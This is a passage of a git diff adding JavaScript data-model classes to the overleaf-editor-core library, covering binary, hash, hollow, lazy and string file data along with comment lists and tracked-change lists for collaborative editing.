+ * + * @param {BlobStore} blobStore + * @return {Promise} a raw HashFile + */ + async store(blobStore) { + /** @type RawFile */ + const raw = await this.data.store(blobStore) + storeRawMetadata(this.metadata, raw) + return raw + } +} + +/** + * @param {Object} metadata + * @param {RawFile} raw + */ +function storeRawMetadata(metadata, raw) { + if (!_.isEmpty(metadata)) { + raw.metadata = _.cloneDeep(metadata) + } +} + +module.exports = File diff --git a/libraries/overleaf-editor-core/lib/file_data/binary_file_data.js b/libraries/overleaf-editor-core/lib/file_data/binary_file_data.js new file mode 100644 index 0000000..7919634 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/binary_file_data.js @@ -0,0 +1,82 @@ +'use strict' + +const assert = require('check-types').assert + +const Blob = require('../blob') +const FileData = require('./') + +/** + * @import { RawBinaryFileData } from '../types' + */ + +class BinaryFileData extends FileData { + /** + * @param {string} hash + * @param {number} byteLength + * @see FileData + */ + constructor(hash, byteLength) { + super() + assert.match(hash, Blob.HEX_HASH_RX, 'BinaryFileData: bad hash') + assert.integer(byteLength, 'BinaryFileData: bad byteLength') + assert.greaterOrEqual(byteLength, 0, 'BinaryFileData: low byteLength') + + this.hash = hash + this.byteLength = byteLength + } + + /** + * @param {RawBinaryFileData} raw + * @returns {BinaryFileData} + */ + static fromRaw(raw) { + return new BinaryFileData(raw.hash, raw.byteLength) + } + + /** + * @inheritdoc + * @returns {RawBinaryFileData} + */ + toRaw() { + return { hash: this.hash, byteLength: this.byteLength } + } + + /** @inheritdoc */ + getHash() { + return this.hash + } + + /** @inheritdoc */ + isEditable() { + return false + } + + /** @inheritdoc */ + getByteLength() { + return this.byteLength + } + + /** @inheritdoc */ + async toEager() { + return this + } + + /** @inheritdoc */ + async toLazy() { + return this + } + + /** @inheritdoc */ + async toHollow() { + return FileData.createHollow(this.byteLength, null) + } + + /** @inheritdoc + * @return {Promise} + */ + async store() { + return { hash: this.hash } + } +} + +module.exports = BinaryFileData diff --git a/libraries/overleaf-editor-core/lib/file_data/clear_tracking_props.js b/libraries/overleaf-editor-core/lib/file_data/clear_tracking_props.js new file mode 100644 index 0000000..ba7f0bf --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/clear_tracking_props.js @@ -0,0 +1,28 @@ +// @ts-check + +/** + * @import { ClearTrackingPropsRawData } from '../types' + */ + +class ClearTrackingProps { + constructor() { + this.type = 'none' + } + + /** + * @param {any} other + * @returns {boolean} + */ + equals(other) { + return other instanceof ClearTrackingProps + } + + /** + * @returns {ClearTrackingPropsRawData} + */ + toRaw() { + return { type: 'none' } + } +} + +module.exports = ClearTrackingProps diff --git a/libraries/overleaf-editor-core/lib/file_data/comment_list.js b/libraries/overleaf-editor-core/lib/file_data/comment_list.js new file mode 100644 index 0000000..69e5529 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/comment_list.js @@ -0,0 +1,124 @@ +// @ts-check +const Comment = require('../comment') + +/** + * @import { CommentRawData } from "../types" + * @import Range from "../range" + */ + +class CommentList { + /** + * @param {Comment[]} comments + */ + constructor(comments) { + this.comments = new Map(comments.map(comment => [comment.id, comment])) + } + + /** + * @returns 
{IterableIterator} + */ + [Symbol.iterator]() { + return this.comments.values() + } + + /** + * Returns the contents of this list in an array + * + * @returns {Comment[]} + */ + toArray() { + return Array.from(this) + } + + /** + * Return the length of the comment list + * + * @returns {number} + */ + get length() { + return this.comments.size + } + + /** + * Return the raw version of the comment list + * + * @returns {CommentRawData[]} + */ + toRaw() { + const raw = [] + for (const comment of this.comments.values()) { + raw.push(comment.toRaw()) + } + return raw + } + + /** + * @param {string} id + * @returns {Comment | undefined} + */ + getComment(id) { + return this.comments.get(id) + } + + /** + * @param {Comment} newComment + */ + add(newComment) { + this.comments.set(newComment.id, newComment) + } + + /** + * @param {string} id + */ + delete(id) { + return this.comments.delete(id) + } + + /** + * @param {CommentRawData[]} rawComments + */ + static fromRaw(rawComments) { + return new CommentList(rawComments.map(Comment.fromRaw)) + } + + /** + * @param {Range} range + * @param {{ commentIds?: string[] }} opts + */ + applyInsert(range, opts = { commentIds: [] }) { + if (!opts.commentIds) { + opts.commentIds = [] + } + for (const [commentId, comment] of this.comments) { + const commentAfterInsert = comment.applyInsert( + range.pos, + range.length, + opts.commentIds.includes(commentId) + ) + this.comments.set(commentId, commentAfterInsert) + } + } + + /** + * @param {Range} range + */ + applyDelete(range) { + for (const [commentId, comment] of this.comments) { + const commentAfterDelete = comment.applyDelete(range) + this.comments.set(commentId, commentAfterDelete) + } + } + + /** + * + * @param {Range} range + * @returns {string[]} + */ + idsCoveringRange(range) { + return Array.from(this.comments.entries()) + .filter(([, comment]) => comment.ranges.some(r => r.contains(range))) + .map(([id]) => id) + } +} + +module.exports = CommentList diff --git a/libraries/overleaf-editor-core/lib/file_data/hash_file_data.js b/libraries/overleaf-editor-core/lib/file_data/hash_file_data.js new file mode 100644 index 0000000..d12da1c --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/hash_file_data.js @@ -0,0 +1,134 @@ +// @ts-check +'use strict' + +const assert = require('check-types').assert + +const Blob = require('../blob') +const FileData = require('./') +/** + * @import StringFileData from './string_file_data' + * @import LazyStringFileData from './lazy_string_file_data' + * @import HollowStringFileData from './hollow_string_file_data' + * @import { BlobStore, RawHashFileData } from '../types' + */ + +class HashFileData extends FileData { + /** + * @constructor + * @param {string} hash + * @param {string} [rangesHash] + * @see FileData + */ + constructor(hash, rangesHash) { + super() + assert.match(hash, Blob.HEX_HASH_RX, 'HashFileData: bad hash') + if (rangesHash) { + assert.match( + rangesHash, + Blob.HEX_HASH_RX, + 'HashFileData: bad ranges hash' + ) + } + this.hash = hash + this.rangesHash = rangesHash + } + + /** + * + * @param {RawHashFileData} raw + */ + static fromRaw(raw) { + return new HashFileData(raw.hash, raw.rangesHash) + } + + /** + * @inheritdoc + * @returns {RawHashFileData} + */ + toRaw() { + /** @type RawHashFileData */ + const raw = { hash: this.hash } + if (this.rangesHash) { + raw.rangesHash = this.rangesHash + } + return raw + } + + /** + * @inheritdoc + * @returns {string} + */ + getHash() { + return this.hash + } + + /** + * @inheritdoc + * @returns {string 
| undefined} + */ + getRangesHash() { + return this.rangesHash + } + + /** + * @inheritdoc + * @param {BlobStore} blobStore + * @returns {Promise} + */ + async toEager(blobStore) { + const lazyFileData = await this.toLazy(blobStore) + return await lazyFileData.toEager(blobStore) + } + + /** + * @inheritdoc + * @param {BlobStore} blobStore + * @returns {Promise} + */ + async toLazy(blobStore) { + const [blob, rangesBlob] = await Promise.all([ + blobStore.getBlob(this.hash), + this.rangesHash + ? blobStore.getBlob(this.rangesHash) + : Promise.resolve(undefined), + ]) + if (rangesBlob === null) { + // We attempted to look up the blob, but none was found + throw new Error('Failed to look up rangesHash in blobStore') + } + if (!blob) throw new Error('blob not found: ' + this.hash) + // TODO(das7pad): inline 2nd path of FileData.createLazyFromBlobs? + // @ts-ignore + return FileData.createLazyFromBlobs(blob, rangesBlob) + } + + /** + * @inheritdoc + * @param {BlobStore} blobStore + * @returns {Promise} + */ + async toHollow(blobStore) { + const blob = await blobStore.getBlob(this.hash) + if (!blob) { + throw new Error('Failed to look up hash in blobStore') + } + // TODO(das7pad): inline 2nd path of FileData.createHollow? + // @ts-ignore + return FileData.createHollow(blob.getByteLength(), blob.getStringLength()) + } + + /** + * @inheritdoc + * @returns {Promise} + */ + async store() { + /** @type RawHashFileData */ + const raw = { hash: this.hash } + if (this.rangesHash) { + raw.rangesHash = this.rangesHash + } + return raw + } +} + +module.exports = HashFileData diff --git a/libraries/overleaf-editor-core/lib/file_data/hollow_binary_file_data.js b/libraries/overleaf-editor-core/lib/file_data/hollow_binary_file_data.js new file mode 100644 index 0000000..4187024 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/hollow_binary_file_data.js @@ -0,0 +1,55 @@ +'use strict' + +const assert = require('check-types').assert + +const FileData = require('./') + +/** + * @import { RawHollowBinaryFileData } from '../types' + */ + +class HollowBinaryFileData extends FileData { + /** + * @param {number} byteLength + * @see FileData + */ + constructor(byteLength) { + super() + assert.integer(byteLength, 'HollowBinaryFileData: bad byteLength') + assert.greaterOrEqual(byteLength, 0, 'HollowBinaryFileData: low byteLength') + this.byteLength = byteLength + } + + /** + * @param {RawHollowBinaryFileData} raw + * @returns {HollowBinaryFileData} + */ + static fromRaw(raw) { + return new HollowBinaryFileData(raw.byteLength) + } + + /** + * @inheritdoc + * @returns {RawHollowBinaryFileData} + */ + toRaw() { + return { byteLength: this.byteLength } + } + + /** @inheritdoc */ + getByteLength() { + return this.byteLength + } + + /** @inheritdoc */ + isEditable() { + return false + } + + /** @inheritdoc */ + async toHollow() { + return this + } +} + +module.exports = HollowBinaryFileData diff --git a/libraries/overleaf-editor-core/lib/file_data/hollow_string_file_data.js b/libraries/overleaf-editor-core/lib/file_data/hollow_string_file_data.js new file mode 100644 index 0000000..717c060 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/hollow_string_file_data.js @@ -0,0 +1,69 @@ +// @ts-check +'use strict' + +const assert = require('check-types').assert + +const FileData = require('./') + +/** + * @import { RawHollowStringFileData } from '../types' + * @import EditOperation from '../operation/edit_operation' + */ + +class HollowStringFileData extends FileData { + /** + * @param {number} 
stringLength + * @see FileData + */ + constructor(stringLength) { + super() + assert.integer(stringLength, 'HollowStringFileData: bad stringLength') + assert.greaterOrEqual( + stringLength, + 0, + 'HollowStringFileData: low stringLength' + ) + this.stringLength = stringLength + } + + /** + * @param {RawHollowStringFileData} raw + * @returns {HollowStringFileData} + */ + static fromRaw(raw) { + return new HollowStringFileData(raw.stringLength) + } + + /** + * @inheritdoc + * @returns {RawHollowStringFileData} + */ + toRaw() { + return { stringLength: this.stringLength } + } + + /** @inheritdoc */ + getStringLength() { + return this.stringLength + } + + /** @inheritdoc */ + isEditable() { + return true + } + + /** @inheritdoc */ + async toHollow() { + return this + } + + /** + * @inheritdoc + * @param {EditOperation} operation + */ + edit(operation) { + this.stringLength = operation.applyToLength(this.stringLength) + } +} + +module.exports = HollowStringFileData diff --git a/libraries/overleaf-editor-core/lib/file_data/index.js b/libraries/overleaf-editor-core/lib/file_data/index.js new file mode 100644 index 0000000..a6ae574 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/index.js @@ -0,0 +1,229 @@ +// @ts-check + +'use strict' + +const assert = require('check-types').assert + +const Blob = require('../blob') + +/** + * @import { BlobStore, ReadonlyBlobStore, RawFileData, CommentRawData } from "../types" + * @import EditOperation from "../operation/edit_operation" + * @import CommentList from "../file_data/comment_list" + * @import TrackedChangeList from "../file_data/tracked_change_list" + */ + +/** + * Helper to represent the content of a file. This class and its subclasses + * should be used only through {@link File}. + */ +class FileData { + /** @see File.fromRaw + * @param {RawFileData} raw + */ + static fromRaw(raw) { + // TODO(das7pad): can we teach typescript to understand our polymorphism? 
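+ // Dispatch summary (mirrors the checks below):
+ // { hash, byteLength } -> BinaryFileData
+ // { hash, stringLength } -> LazyStringFileData
+ // { hash } -> HashFileData
+ // { byteLength } -> HollowBinaryFileData
+ // { stringLength } -> HollowStringFileData
+ // { content } -> StringFileData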
+ if (Object.prototype.hasOwnProperty.call(raw, 'hash')) { + if (Object.prototype.hasOwnProperty.call(raw, 'byteLength')) + // @ts-ignore + return BinaryFileData.fromRaw(raw) + if (Object.prototype.hasOwnProperty.call(raw, 'stringLength')) + // @ts-ignore + return LazyStringFileData.fromRaw(raw) + // @ts-ignore + return HashFileData.fromRaw(raw) + } + if (Object.prototype.hasOwnProperty.call(raw, 'byteLength')) + // @ts-ignore + return HollowBinaryFileData.fromRaw(raw) + if (Object.prototype.hasOwnProperty.call(raw, 'stringLength')) + // @ts-ignore + return HollowStringFileData.fromRaw(raw) + if (Object.prototype.hasOwnProperty.call(raw, 'content')) + // @ts-ignore + return StringFileData.fromRaw(raw) + throw new Error('FileData: bad raw object ' + JSON.stringify(raw)) + } + + /** @see File.createHollow + * @param {number} byteLength + * @param {number} [stringLength] + */ + static createHollow(byteLength, stringLength) { + if (stringLength == null) { + return new HollowBinaryFileData(byteLength) + } + return new HollowStringFileData(stringLength) + } + + /** + * @see File.createLazyFromBlob + * @param {Blob} blob + * @param {Blob} [rangesBlob] + */ + static createLazyFromBlobs(blob, rangesBlob) { + assert.instance(blob, Blob, 'FileData: bad blob') + const stringLength = blob.getStringLength() + if (stringLength == null) { + return new BinaryFileData(blob.getHash(), blob.getByteLength()) + } + return new LazyStringFileData( + blob.getHash(), + rangesBlob?.getHash(), + stringLength + ) + } + + /** + * @returns {RawFileData} + */ + toRaw() { + throw new Error('FileData: toRaw not implemented') + } + + /** + * @see File#getHash + * @return {string | null | undefined} + */ + + getHash() { + return null + } + + /** + * @see File#getHash + * @return {string | null | undefined} + */ + getRangesHash() { + return null + } + + /** + * @see File#getContent + * @param {import('../file').FileGetContentOptions} [opts] + * @return {string | null | undefined} + */ + getContent(opts = {}) { + return null + } + + /** + * @see File#isEditable + * @return {boolean | null | undefined} null if it is not currently known + */ + isEditable() { + return null + } + + /** + * @see File#getByteLength + * @return {number | null | undefined} + */ + getByteLength() { + return null + } + + /** + * @see File#getStringLength + * @return {number | null | undefined} + */ + getStringLength() { + return null + } + + /** + * @see File#edit + * @param {EditOperation} editOperation + */ + edit(editOperation) { + throw new Error('edit not implemented for ' + JSON.stringify(this)) + } + + /** + * @function + * @param {ReadonlyBlobStore} blobStore + * @return {Promise} + * @abstract + * @see FileData#load + */ + async toEager(blobStore) { + throw new Error('toEager not implemented for ' + JSON.stringify(this)) + } + + /** + * @function + * @param {ReadonlyBlobStore} blobStore + * @return {Promise} + * @abstract + * @see FileData#load + */ + async toLazy(blobStore) { + throw new Error('toLazy not implemented for ' + JSON.stringify(this)) + } + + /** + * @function + * @param {ReadonlyBlobStore} blobStore + * @return {Promise} + * @abstract + * @see FileData#load + */ + async toHollow(blobStore) { + throw new Error('toHollow not implemented for ' + JSON.stringify(this)) + } + + /** + * @see File#load + * @param {string} kind + * @param {ReadonlyBlobStore} blobStore + * @return {Promise} + */ + async load(kind, blobStore) { + if (kind === 'eager') return await this.toEager(blobStore) + if (kind === 'lazy') return await 
this.toLazy(blobStore) + if (kind === 'hollow') return await this.toHollow(blobStore) + throw new Error('bad file data load kind: ' + kind) + } + + /** + * @see File#store + * @function + * @param {BlobStore} blobStore + * @return {Promise} a raw HashFile + * @abstract + */ + async store(blobStore) { + throw new Error('store not implemented for ' + JSON.stringify(this)) + } + + /** + * @see File#getComments + * @function + * @return {CommentList} + * @abstract + */ + getComments() { + throw new Error('getComments not implemented for ' + JSON.stringify(this)) + } + + /** + * @see File#getTrackedChanges + * @function + * @return {TrackedChangeList} + * @abstract + */ + getTrackedChanges() { + throw new Error( + 'getTrackedChanges not implemented for ' + JSON.stringify(this) + ) + } +} + +module.exports = FileData + +const BinaryFileData = require('./binary_file_data') +const HashFileData = require('./hash_file_data') +const HollowBinaryFileData = require('./hollow_binary_file_data') +const HollowStringFileData = require('./hollow_string_file_data') +const LazyStringFileData = require('./lazy_string_file_data') +const StringFileData = require('./string_file_data') diff --git a/libraries/overleaf-editor-core/lib/file_data/lazy_string_file_data.js b/libraries/overleaf-editor-core/lib/file_data/lazy_string_file_data.js new file mode 100644 index 0000000..bc11b3e --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/lazy_string_file_data.js @@ -0,0 +1,190 @@ +// @ts-check +'use strict' + +const _ = require('lodash') +const assert = require('check-types').assert + +const Blob = require('../blob') +const FileData = require('./') +const EagerStringFileData = require('./string_file_data') +const EditOperation = require('../operation/edit_operation') +const EditOperationBuilder = require('../operation/edit_operation_builder') + +/** + * @import { BlobStore, ReadonlyBlobStore, RangesBlob, RawFileData, RawLazyStringFileData } from '../types' + */ + +class LazyStringFileData extends FileData { + /** + * @param {string} hash + * @param {string | undefined} rangesHash + * @param {number} stringLength + * @param {Array.} [operations] + * @see FileData + */ + constructor(hash, rangesHash, stringLength, operations) { + super() + assert.match(hash, Blob.HEX_HASH_RX) + if (rangesHash) { + assert.match(rangesHash, Blob.HEX_HASH_RX) + } + assert.greaterOrEqual(stringLength, 0) + assert.maybe.array.of.instance(operations, EditOperation) + + this.hash = hash + this.rangesHash = rangesHash + this.stringLength = stringLength + this.operations = operations || [] + } + + /** + * @param {RawLazyStringFileData} raw + * @returns {LazyStringFileData} + */ + static fromRaw(raw) { + return new LazyStringFileData( + raw.hash, + raw.rangesHash, + raw.stringLength, + raw.operations && _.map(raw.operations, EditOperationBuilder.fromJSON) + ) + } + + /** + * @inheritdoc + * @returns {RawLazyStringFileData} + */ + toRaw() { + /** @type RawLazyStringFileData */ + const raw = { + hash: this.hash, + stringLength: this.stringLength, + } + if (this.rangesHash) { + raw.rangesHash = this.rangesHash + } + if (this.operations.length) { + raw.operations = _.map(this.operations, function (operation) { + return operation.toJSON() + }) + } + return raw + } + + /** @inheritdoc */ + getHash() { + if (this.operations.length) return null + return this.hash + } + + /** @inheritdoc */ + getRangesHash() { + if (this.operations.length) return null + return this.rangesHash + } + + /** @inheritdoc */ + isEditable() { + return true + } + + /** 
+ * For project quota checking, we approximate the byte length by the UTF-8 + * length for hollow files. This isn't strictly speaking correct; it is an + * underestimate of byte length. + * + * @return {number} + */ + getByteLength() { + return this.stringLength + } + + /** @inheritdoc */ + getStringLength() { + return this.stringLength + } + + /** + * Get the cached text operations that are to be applied to this file to get + * from the content with its last known hash to its latest content. + * + * @return {Array.} + */ + getOperations() { + return this.operations + } + + /** + * @inheritdoc + * @param {ReadonlyBlobStore} blobStore + * @returns {Promise} + */ + async toEager(blobStore) { + const [content, ranges] = await Promise.all([ + blobStore.getString(this.hash), + this.rangesHash + ? /** @type {Promise} */ ( + blobStore.getObject(this.rangesHash) + ) + : Promise.resolve(undefined), + ]) + const file = new EagerStringFileData( + content, + ranges?.comments, + ranges?.trackedChanges + ) + applyOperations(this.operations, file) + return file + } + + /** @inheritdoc */ + async toLazy() { + return this + } + + /** @inheritdoc */ + async toHollow() { + // TODO(das7pad): inline 2nd path of FileData.createLazyFromBlobs? + // @ts-ignore + return FileData.createHollow(null, this.stringLength) + } + + /** @inheritdoc + * @param {EditOperation} operation + */ + edit(operation) { + this.stringLength = operation.applyToLength(this.stringLength) + this.operations.push(operation) + } + + /** @inheritdoc + * @param {BlobStore} blobStore + * @return {Promise} + */ + async store(blobStore) { + if (this.operations.length === 0) { + /** @type RawFileData */ + const raw = { hash: this.hash } + if (this.rangesHash) { + raw.rangesHash = this.rangesHash + } + return raw + } + const eager = await this.toEager(blobStore) + this.operations.length = 0 + /** @type RawFileData */ + return await eager.store(blobStore) + } +} + +/** + * + * @param {EditOperation[]} operations + * @param {EagerStringFileData} file + * @returns {void} + */ +function applyOperations(operations, file) { + _.each(operations, operation => operation.apply(file)) +} + +module.exports = LazyStringFileData diff --git a/libraries/overleaf-editor-core/lib/file_data/string_file_data.js b/libraries/overleaf-editor-core/lib/file_data/string_file_data.js new file mode 100644 index 0000000..2613c30 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/string_file_data.js @@ -0,0 +1,151 @@ +// @ts-check +'use strict' + +const assert = require('check-types').assert + +const FileData = require('./') +const CommentList = require('./comment_list') +const TrackedChangeList = require('./tracked_change_list') + +/** + * @import { StringFileRawData, RawFileData, BlobStore, CommentRawData } from "../types" + * @import { TrackedChangeRawData, RangesBlob } from "../types" + * @import EditOperation from "../operation/edit_operation" + */ + +class StringFileData extends FileData { + /** + * @param {string} content + * @param {CommentRawData[]} [rawComments] + * @param {TrackedChangeRawData[]} [rawTrackedChanges] + */ + constructor(content, rawComments = [], rawTrackedChanges = []) { + super() + assert.string(content) + this.content = content + this.comments = CommentList.fromRaw(rawComments) + this.trackedChanges = TrackedChangeList.fromRaw(rawTrackedChanges) + } + + /** + * @param {StringFileRawData} raw + * @returns {StringFileData} + */ + static fromRaw(raw) { + return new StringFileData( + raw.content, + raw.comments || [], + raw.trackedChanges 
|| [] + ) + } + + /** + * @inheritdoc + * @returns {StringFileRawData} + */ + toRaw() { + /** @type StringFileRawData */ + const raw = { content: this.content } + + if (this.comments.length) { + raw.comments = this.comments.toRaw() + } + + if (this.trackedChanges.length) { + raw.trackedChanges = this.trackedChanges.toRaw() + } + + return raw + } + + /** @inheritdoc */ + isEditable() { + return true + } + + /** + * @inheritdoc + * @param {import('../file').FileGetContentOptions} [opts] + */ + getContent(opts = {}) { + let content = '' + let cursor = 0 + if (opts.filterTrackedDeletes) { + for (const tc of this.trackedChanges.asSorted()) { + if (tc.tracking.type !== 'delete') { + continue + } + if (cursor < tc.range.start) { + content += this.content.slice(cursor, tc.range.start) + } + // skip the tracked change + cursor = tc.range.end + } + } + if (cursor < this.content.length) { + content += this.content.slice(cursor) + } + return content + } + + /** @inheritdoc */ + getByteLength() { + return Buffer.byteLength(this.content) + } + + /** @inheritdoc */ + getStringLength() { + return this.content.length + } + + /** + * @inheritdoc + * @param {EditOperation} operation */ + edit(operation) { + operation.apply(this) + } + + /** @inheritdoc */ + getComments() { + return this.comments + } + + /** @inheritdoc */ + getTrackedChanges() { + return this.trackedChanges + } + + /** + * @inheritdoc + * @returns {Promise} + */ + async toEager() { + return this + } + + /** @inheritdoc */ + async toHollow() { + return FileData.createHollow(this.getByteLength(), this.getStringLength()) + } + + /** + * @inheritdoc + * @param {BlobStore} blobStore + * @return {Promise} + */ + async store(blobStore) { + const blob = await blobStore.putString(this.content) + if (this.comments.comments.size || this.trackedChanges.length) { + /** @type {RangesBlob} */ + const ranges = { + comments: this.getComments().toRaw(), + trackedChanges: this.trackedChanges.toRaw(), + } + const rangesBlob = await blobStore.putObject(ranges) + return { hash: blob.getHash(), rangesHash: rangesBlob.getHash() } + } + return { hash: blob.getHash() } + } +} + +module.exports = StringFileData diff --git a/libraries/overleaf-editor-core/lib/file_data/tracked_change.js b/libraries/overleaf-editor-core/lib/file_data/tracked_change.js new file mode 100644 index 0000000..d0e6517 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/tracked_change.js @@ -0,0 +1,89 @@ +// @ts-check +const Range = require('../range') +const TrackingProps = require('./tracking_props') + +/** + * @import { TrackedChangeRawData } from "../types" + */ + +class TrackedChange { + /** + * @param {Range} range + * @param {TrackingProps} tracking + */ + constructor(range, tracking) { + /** + * @readonly + * @type {Range} + */ + this.range = range + /** + * @readonly + * @type {TrackingProps} + */ + this.tracking = tracking + } + + /** + * + * @param {TrackedChangeRawData} raw + * @returns {TrackedChange} + */ + static fromRaw(raw) { + return new TrackedChange( + Range.fromRaw(raw.range), + TrackingProps.fromRaw(raw.tracking) + ) + } + + /** + * @returns {TrackedChangeRawData} + */ + toRaw() { + return { + range: this.range.toRaw(), + tracking: this.tracking.toRaw(), + } + } + + /** + * Checks whether the tracked change can be merged with another + * @param {TrackedChange} other + * @returns {boolean} + */ + canMerge(other) { + if (!(other instanceof TrackedChange)) { + return false + } + return ( + this.tracking.type === other.tracking.type && + this.tracking.userId === 
other.tracking.userId && + this.range.touches(other.range) && + this.range.canMerge(other.range) + ) + } + + /** + * Merges another tracked change into this, updating the range and tracking + * timestamp + * @param {TrackedChange} other + * @returns {TrackedChange} + */ + merge(other) { + if (!this.canMerge(other)) { + throw new Error('Cannot merge tracked changes') + } + return new TrackedChange( + this.range.merge(other.range), + new TrackingProps( + this.tracking.type, + this.tracking.userId, + this.tracking.ts.getTime() > other.tracking.ts.getTime() + ? this.tracking.ts + : other.tracking.ts + ) + ) + } +} + +module.exports = TrackedChange diff --git a/libraries/overleaf-editor-core/lib/file_data/tracked_change_list.js b/libraries/overleaf-editor-core/lib/file_data/tracked_change_list.js new file mode 100644 index 0000000..263b37a --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/tracked_change_list.js @@ -0,0 +1,276 @@ +// @ts-check +const Range = require('../range') +const TrackedChange = require('./tracked_change') +const TrackingProps = require('../file_data/tracking_props') + +/** + * @import { TrackingDirective, TrackedChangeRawData } from "../types" + */ + +class TrackedChangeList { + /** + * + * @param {TrackedChange[]} trackedChanges + */ + constructor(trackedChanges) { + /** + * @type {TrackedChange[]} + */ + this._trackedChanges = trackedChanges + } + + /** + * + * @param {TrackedChangeRawData[]} raw + * @returns {TrackedChangeList} + */ + static fromRaw(raw) { + return new TrackedChangeList(raw.map(TrackedChange.fromRaw)) + } + + /** + * Converts the tracked changes to a raw object + * @returns {TrackedChangeRawData[]} + */ + toRaw() { + return this._trackedChanges.map(change => change.toRaw()) + } + + get length() { + return this._trackedChanges.length + } + + /** + * @returns {readonly TrackedChange[]} + */ + asSorted() { + // NOTE: Once all code dependent on this is typed, we can just return + // _trackedChanges. + return Array.from(this._trackedChanges) + } + + /** + * Returns the tracked changes that are fully included in the range + * @param {Range} range + * @returns {TrackedChange[]} + */ + inRange(range) { + return this._trackedChanges.filter(change => range.contains(change.range)) + } + + /** + * Returns the tracking props for a given range. 
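+ *
+ * e.g. (sketch) with a tracked change covering [4, 10), propsAtRange
+ * returns that change's TrackingProps for new Range(5, 3), and undefined
+ * for any range not fully contained in a single tracked change.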
+ * @param {Range} range + * @returns {TrackingProps | undefined} + */ + propsAtRange(range) { + return this._trackedChanges.find(change => change.range.contains(range)) + ?.tracking + } + + /** + * Removes the tracked changes that are fully included in the range + * @param {Range} range + */ + removeInRange(range) { + this._trackedChanges = this._trackedChanges.filter( + change => !range.contains(change.range) + ) + } + + /** + * Adds a tracked change to the list + * @param {TrackedChange} trackedChange + */ + add(trackedChange) { + this._trackedChanges.push(trackedChange) + this._mergeRanges() + } + + /** + * Collapses consecutive (and compatible) ranges + * @returns {void} + */ + _mergeRanges() { + if (this._trackedChanges.length < 2) { + return + } + // ranges are non-overlapping so we can sort based on their first indices + this._trackedChanges.sort((a, b) => a.range.start - b.range.start) + const newTrackedChanges = [this._trackedChanges[0]] + for (let i = 1; i < this._trackedChanges.length; i++) { + const last = newTrackedChanges[newTrackedChanges.length - 1] + const current = this._trackedChanges[i] + if (last.range.overlaps(current.range)) { + throw new Error('Ranges cannot overlap') + } + if (current.range.isEmpty()) { + throw new Error('Tracked changes range cannot be empty') + } + if (last.canMerge(current)) { + newTrackedChanges[newTrackedChanges.length - 1] = last.merge(current) + } else { + newTrackedChanges.push(current) + } + } + this._trackedChanges = newTrackedChanges + } + + /** + * + * @param {number} cursor + * @param {string} insertedText + * @param {{tracking?: TrackingProps}} opts + */ + applyInsert(cursor, insertedText, opts = {}) { + const newTrackedChanges = [] + for (const trackedChange of this._trackedChanges) { + if ( + // If the cursor is before or at the insertion point, we need to move + // the tracked change + trackedChange.range.startIsAfter(cursor) || + cursor === trackedChange.range.start + ) { + newTrackedChanges.push( + new TrackedChange( + trackedChange.range.moveBy(insertedText.length), + trackedChange.tracking + ) + ) + } else if (cursor === trackedChange.range.end) { + // The insertion is at the end of the tracked change. So we don't need + // to move it. + newTrackedChanges.push(trackedChange) + } else if (trackedChange.range.containsCursor(cursor)) { + // If the tracked change is in the inserted text, we need to expand it + // split in three chunks. 
The middle one is added if it is a tracked insertion + const [firstRange, , thirdRange] = trackedChange.range.insertAt( + cursor, + insertedText.length + ) + const firstPart = new TrackedChange(firstRange, trackedChange.tracking) + if (!firstPart.range.isEmpty()) { + newTrackedChanges.push(firstPart) + } + // second part will be added at the end if it is a tracked insertion + const thirdPart = new TrackedChange(thirdRange, trackedChange.tracking) + if (!thirdPart.range.isEmpty()) { + newTrackedChanges.push(thirdPart) + } + } else { + newTrackedChanges.push(trackedChange) + } + } + + if (opts.tracking) { + // This is a new tracked change + const newTrackedChange = new TrackedChange( + new Range(cursor, insertedText.length), + opts.tracking + ) + newTrackedChanges.push(newTrackedChange) + } + this._trackedChanges = newTrackedChanges + this._mergeRanges() + } + + /** + * + * @param {number} cursor + * @param {number} length + */ + applyDelete(cursor, length) { + const newTrackedChanges = [] + for (const trackedChange of this._trackedChanges) { + const deletedRange = new Range(cursor, length) + // If the tracked change is after the deletion, we need to move it + if (deletedRange.contains(trackedChange.range)) { + continue + } else if (deletedRange.overlaps(trackedChange.range)) { + const newRange = trackedChange.range.subtract(deletedRange) + if (!newRange.isEmpty()) { + newTrackedChanges.push( + new TrackedChange(newRange, trackedChange.tracking) + ) + } + } else if (trackedChange.range.startIsAfter(cursor)) { + newTrackedChanges.push( + new TrackedChange( + trackedChange.range.moveBy(-length), + trackedChange.tracking + ) + ) + } else { + newTrackedChanges.push(trackedChange) + } + } + this._trackedChanges = newTrackedChanges + this._mergeRanges() + } + + /** + * @param {number} cursor + * @param {number} length + * @param {{tracking?: TrackingDirective}} opts + */ + applyRetain(cursor, length, opts = {}) { + // If there's no tracking info, leave everything as-is + if (!opts.tracking) { + return + } + const newTrackedChanges = [] + const retainedRange = new Range(cursor, length) + for (const trackedChange of this._trackedChanges) { + if (retainedRange.contains(trackedChange.range)) { + // Remove the range + } else if (retainedRange.overlaps(trackedChange.range)) { + if (trackedChange.range.contains(retainedRange)) { + const [leftRange, rightRange] = trackedChange.range.splitAt(cursor) + if (!leftRange.isEmpty()) { + newTrackedChanges.push( + new TrackedChange(leftRange, trackedChange.tracking) + ) + } + if (!rightRange.isEmpty() && rightRange.length > length) { + newTrackedChanges.push( + new TrackedChange( + rightRange.moveBy(length).shrinkBy(length), + trackedChange.tracking + ) + ) + } + } else if (retainedRange.start <= trackedChange.range.start) { + // overlaps to the left + const [, reducedRange] = trackedChange.range.splitAt( + retainedRange.end + ) + if (!reducedRange.isEmpty()) { + newTrackedChanges.push( + new TrackedChange(reducedRange, trackedChange.tracking) + ) + } + } else { + // overlaps to the right + const [reducedRange] = trackedChange.range.splitAt(cursor) + if (!reducedRange.isEmpty()) { + newTrackedChanges.push( + new TrackedChange(reducedRange, trackedChange.tracking) + ) + } + } + } else { + // keep the range + 